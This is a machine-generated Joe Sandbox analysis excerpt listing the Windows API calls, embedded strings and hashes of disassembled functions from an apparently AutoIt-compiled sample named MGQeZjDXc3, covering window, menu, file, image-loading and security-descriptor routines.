                                                  • Part of subcall function 00AA660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA53B1,?,?,00AA61FF,?,00000000,00000001,00000000), ref: 00AA662F
                                                • __wsplitpath.LIBCMT ref: 00AAC93E
                                                  • Part of subcall function 00AC1DFC: __wsplitpath_helper.LIBCMT ref: 00AC1E3C
                                                • _wcscpy.LIBCMT ref: 00AAC953
                                                • _wcscat.LIBCMT ref: 00AAC968
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00AAC978
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AACABE
                                                  • Part of subcall function 00AAB337: _wcscpy.LIBCMT ref: 00AAB36F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 2258743419-1018226102
                                                • Opcode ID: a7ba6c23c7f70096acca4d740ee0f566bfa2d071f5d642f4ea189e5287587710
                                                • Instruction ID: 5705ba64f8e628221a1cc2060dfca039ccf5747bb10f980a666039189dac7272
                                                • Opcode Fuzzy Hash: a7ba6c23c7f70096acca4d740ee0f566bfa2d071f5d642f4ea189e5287587710
                                                • Instruction Fuzzy Hash: E912B0715083419FC724EF24C981AAFBBE5FF9A710F40495EF489932A2DB31DA49CB52
                                                APIs
                                                • _memset.LIBCMT ref: 00B0CEFB
                                                • DestroyWindow.USER32(?,?), ref: 00B0CF73
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B0CFF4
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B0D016
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0D025
                                                • DestroyWindow.USER32(?), ref: 00B0D042
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B0D075
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0D094
                                                • GetDesktopWindow.USER32 ref: 00B0D0A9
                                                • GetWindowRect.USER32(00000000), ref: 00B0D0B0
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B0D0C2
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B0D0DA
                                                  • Part of subcall function 00ABB526: GetWindowLongW.USER32(?,000000EB), ref: 00ABB537
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 3877571568-3619404913
                                                • Opcode ID: e0bddf5d75c2d71bdddaae24f710f4cb43aa90dc11b7222f18d53a24711a5239
                                                • Instruction ID: d5da1bb3d4587dc5a27ed8e23a1b58752c889a1afe0fb99415596d4fd9d3d5b8
                                                • Opcode Fuzzy Hash: e0bddf5d75c2d71bdddaae24f710f4cb43aa90dc11b7222f18d53a24711a5239
                                                • Instruction Fuzzy Hash: 8A71BD74140305AFE721CF68CC95F667BE5EB88704F18495DF98A872E1EB74E942CB22
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • DragQueryPoint.SHELL32(?,?), ref: 00B0F37A
                                                  • Part of subcall function 00B0D7DE: ClientToScreen.USER32(?,?), ref: 00B0D807
                                                  • Part of subcall function 00B0D7DE: GetWindowRect.USER32(?,?), ref: 00B0D87D
                                                  • Part of subcall function 00B0D7DE: PtInRect.USER32(?,?,00B0ED5A), ref: 00B0D88D
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0F3E3
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B0F3EE
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B0F411
                                                • _wcscat.LIBCMT ref: 00B0F441
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B0F458
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0F471
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0F488
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0F4AA
                                                • DragFinish.SHELL32(?), ref: 00B0F4B1
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B0F59C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: d3c999c0f616f24497a75786785aab525029efa7eeeb063bb593ea86356b8ee2
                                                • Instruction ID: 91e40fc78d638bab30c804e790bc172fd64cf39e0af6a11a2c0780165bdcc0a8
                                                • Opcode Fuzzy Hash: d3c999c0f616f24497a75786785aab525029efa7eeeb063bb593ea86356b8ee2
                                                • Instruction Fuzzy Hash: 62612871108301AFD311EF64CC85EAFBBF8EB99714F000A5EF595932A1DB749A09CB52
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 00AEAB3D
                                                • VariantCopy.OLEAUT32(?,?), ref: 00AEAB46
                                                • VariantClear.OLEAUT32(?), ref: 00AEAB52
                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AEAC40
                                                • __swprintf.LIBCMT ref: 00AEAC70
                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00AEAC9C
                                                • VariantInit.OLEAUT32(?), ref: 00AEAD4D
                                                • SysFreeString.OLEAUT32(00000016), ref: 00AEADDF
                                                • VariantClear.OLEAUT32(?), ref: 00AEAE35
                                                • VariantClear.OLEAUT32(?), ref: 00AEAE44
                                                • VariantInit.OLEAUT32(00000000), ref: 00AEAE80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                • API String ID: 3730832054-3931177956
                                                • Opcode ID: e58e94a854b6ba6f9e7c689a46e2b3e150cea3b9f025514385bd64f0e06094b2
                                                • Instruction ID: 1fba4253518c0c1f4921e5508d795d3e065632177ea1afd32a64bc6996f8830a
                                                • Opcode Fuzzy Hash: e58e94a854b6ba6f9e7c689a46e2b3e150cea3b9f025514385bd64f0e06094b2
                                                • Instruction Fuzzy Hash: BAD11231A00255EBDB24AF66C885BBEB7B9FF58700F248455E4099B281DB74FC40DBA2
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 00B071FC
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B07247
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: 95b62fb314decdbb6f08ab0ea8b041dfe61bd578106d58b4ba24947245603b0a
                                                • Instruction ID: 35984677c8166d62434525832a43160b8ded97053d976e2da213675d28be53a9
                                                • Opcode Fuzzy Hash: 95b62fb314decdbb6f08ab0ea8b041dfe61bd578106d58b4ba24947245603b0a
                                                • Instruction Fuzzy Hash: 8D915C706486019BCB04EF10C991AAEFBE5BF55314F104899B8965B3E3DB30FD4ADB91
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B0E5AB
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B0BEAF), ref: 00B0E607
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B0E647
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B0E68C
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B0E6C3
                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00B0BEAF), ref: 00B0E6CF
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0E6DF
                                                • DestroyIcon.USER32(?,?,?,?,?,00B0BEAF), ref: 00B0E6EE
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B0E70B
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B0E717
                                                  • Part of subcall function 00AC0FA7: __wcsicmp_l.LIBCMT ref: 00AC1030
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: 18a38ccb0ab33e62d4368ce536fa3bf8766c3d5f346e47d14e9d70d742c6bd53
                                                • Instruction ID: bcd29b1ed46adea00564d47d58f1d3031303ca0854fd92bbb1c63b47241075cf
                                                • Opcode Fuzzy Hash: 18a38ccb0ab33e62d4368ce536fa3bf8766c3d5f346e47d14e9d70d742c6bd53
                                                • Instruction Fuzzy Hash: 9661DD71500215FAEB209F64DC86FBE7BA8EB18714F104945F921EB1D1EBB5E980CBA0
                                                APIs
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • CharLowerBuffW.USER32(?,?), ref: 00AED292
                                                • GetDriveTypeW.KERNEL32 ref: 00AED2DF
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AED327
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AED35E
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AED38C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1148790751-4113822522
                                                • Opcode ID: 93306bdb4a89863ba15e9a3b15a23a3784715a6c77ddda92236453a812f95c5a
                                                • Instruction ID: 4093be3232252bd37e64a7b7c23a850a99fa1163f812565d4ca01743c4c30e48
                                                • Opcode Fuzzy Hash: 93306bdb4a89863ba15e9a3b15a23a3784715a6c77ddda92236453a812f95c5a
                                                • Instruction Fuzzy Hash: D3514A715043459FC700EF21CA819AEB7F8EF99758F00495DF885672A2DB31EE0ACB92
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00B13973,00000016,0000138C,00000016,?,00000016,00B3DDB4,00000000,?), ref: 00AE26F1
                                                • LoadStringW.USER32(00000000,?,00B13973,00000016), ref: 00AE26FA
                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00B13973,00000016,0000138C,00000016,?,00000016,00B3DDB4,00000000,?,00000016), ref: 00AE271C
                                                • LoadStringW.USER32(00000000,?,00B13973,00000016), ref: 00AE271F
                                                • __swprintf.LIBCMT ref: 00AE276F
                                                • __swprintf.LIBCMT ref: 00AE2780
                                                • _wprintf.LIBCMT ref: 00AE2829
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE2840
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 618562835-2268648507
                                                • Opcode ID: 199e52a6466328b10895b75906be58178e4671500465fa6cc95ae9e54f881353
                                                • Instruction ID: 6329a93384962c450220406793c89293cf11631e16307c9f05bfc442be2373d6
                                                • Opcode Fuzzy Hash: 199e52a6466328b10895b75906be58178e4671500465fa6cc95ae9e54f881353
                                                • Instruction Fuzzy Hash: E0413C72800219AADB15FBE0DE86EEEB77CAF16740F100165B502730D2EB756F59CB60
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AED0D8
                                                • __swprintf.LIBCMT ref: 00AED0FA
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AED137
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AED15C
                                                • _memset.LIBCMT ref: 00AED17B
                                                • _wcsncpy.LIBCMT ref: 00AED1B7
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AED1EC
                                                • CloseHandle.KERNEL32(00000000), ref: 00AED1F7
                                                • RemoveDirectoryW.KERNEL32(?), ref: 00AED200
                                                • CloseHandle.KERNEL32(00000000), ref: 00AED20A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: b1d49243cd0e108f5b5c6a0c9eac80eaca51c4b6876f6e78b09524c4d7f342e9
                                                • Instruction ID: cab08c29d31c091400ae4ff692d5be92275d76c673b605f1366231240dfe40c6
                                                • Opcode Fuzzy Hash: b1d49243cd0e108f5b5c6a0c9eac80eaca51c4b6876f6e78b09524c4d7f342e9
                                                • Instruction Fuzzy Hash: 6631C4B2500249ABDB21DFA1CC49FEB77BCEF89741F1041BAF609D2161EB70D6458B24
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B0BEF4,?,?), ref: 00B0E754
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E76B
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E776
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E783
                                                • GlobalLock.KERNEL32(00000000), ref: 00B0E78C
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E79B
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00B0E7A4
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E7AB
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B0BEF4,?,?,00000000,?), ref: 00B0E7BC
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B2D9BC,?), ref: 00B0E7D5
                                                • GlobalFree.KERNEL32(00000000), ref: 00B0E7E5
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B0E809
                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B0E834
                                                • DeleteObject.GDI32(00000000), ref: 00B0E85C
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B0E872
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: e616e4b23c72966e29653d636702ee0e3153ecf2c42713ccb03a9051536f8ef4
                                                • Instruction ID: 082be566d21369e606e66518ec76d7886af9f84a63e19cd4b67ea09baf9e04a9
                                                • Opcode Fuzzy Hash: e616e4b23c72966e29653d636702ee0e3153ecf2c42713ccb03a9051536f8ef4
                                                • Instruction Fuzzy Hash: CD413B75600204FFDB219F65DC88EAA7BB8EF89711F108458F915E72A0DB30DD42DB60
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 00AF076F
                                                • _wcscat.LIBCMT ref: 00AF0787
                                                • _wcscat.LIBCMT ref: 00AF0799
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AF07AE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF07C2
                                                • GetFileAttributesW.KERNEL32(?), ref: 00AF07DA
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AF07F4
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0806
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: 4d89a9024ff92fa54aefc5b912c1a638190a4435bc444215a86150d464e765a3
                                                • Instruction ID: fa1becb7ec691626f313a7eb51b1ea4c5c18826f4b391237a4d887f46c1514ae
                                                • Opcode Fuzzy Hash: 4d89a9024ff92fa54aefc5b912c1a638190a4435bc444215a86150d464e765a3
                                                • Instruction Fuzzy Hash: 7F81B0715043099FCB64DFA4C844DBEB7E8BB88344F148C2EFA85C7252EB70D9448B92
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B0EF3B
                                                • GetFocus.USER32 ref: 00B0EF4B
                                                • GetDlgCtrlID.USER32(00000000), ref: 00B0EF56
                                                • _memset.LIBCMT ref: 00B0F081
                                                • GetMenuItemInfoW.USER32 ref: 00B0F0AC
                                                • GetMenuItemCount.USER32(00000000), ref: 00B0F0CC
                                                • GetMenuItemID.USER32(?,00000000), ref: 00B0F0DF
                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00B0F113
                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00B0F15B
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B0F193
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B0F1C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 57fcbee54c57c2a0df1b00f0723df70f08471818e422c129e3172b2797321803
                                                • Instruction ID: a2c5bdf29da98a69659b9e03d813a068db5da10466cc87650a4c48cdc98b143e
                                                • Opcode Fuzzy Hash: 57fcbee54c57c2a0df1b00f0723df70f08471818e422c129e3172b2797321803
                                                • Instruction Fuzzy Hash: 0E816E71608302AFD720CF15C884A7BBBE9FF88314F1449ADF995A7291D770D905CBA2
                                                APIs
                                                  • Part of subcall function 00ADABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ADABD7
                                                  • Part of subcall function 00ADABBB: GetLastError.KERNEL32(?,00ADA69F,?,?,?), ref: 00ADABE1
                                                  • Part of subcall function 00ADABBB: GetProcessHeap.KERNEL32(00000008,?,?,00ADA69F,?,?,?), ref: 00ADABF0
                                                  • Part of subcall function 00ADABBB: HeapAlloc.KERNEL32(00000000,?,00ADA69F,?,?,?), ref: 00ADABF7
                                                  • Part of subcall function 00ADABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ADAC0E
                                                  • Part of subcall function 00ADAC56: GetProcessHeap.KERNEL32(00000008,00ADA6B5,00000000,00000000,?,00ADA6B5,?), ref: 00ADAC62
                                                  • Part of subcall function 00ADAC56: HeapAlloc.KERNEL32(00000000,?,00ADA6B5,?), ref: 00ADAC69
                                                  • Part of subcall function 00ADAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ADA6B5,?), ref: 00ADAC7A
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ADA8CB
                                                • _memset.LIBCMT ref: 00ADA8E0
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ADA8FF
                                                • GetLengthSid.ADVAPI32(?), ref: 00ADA910
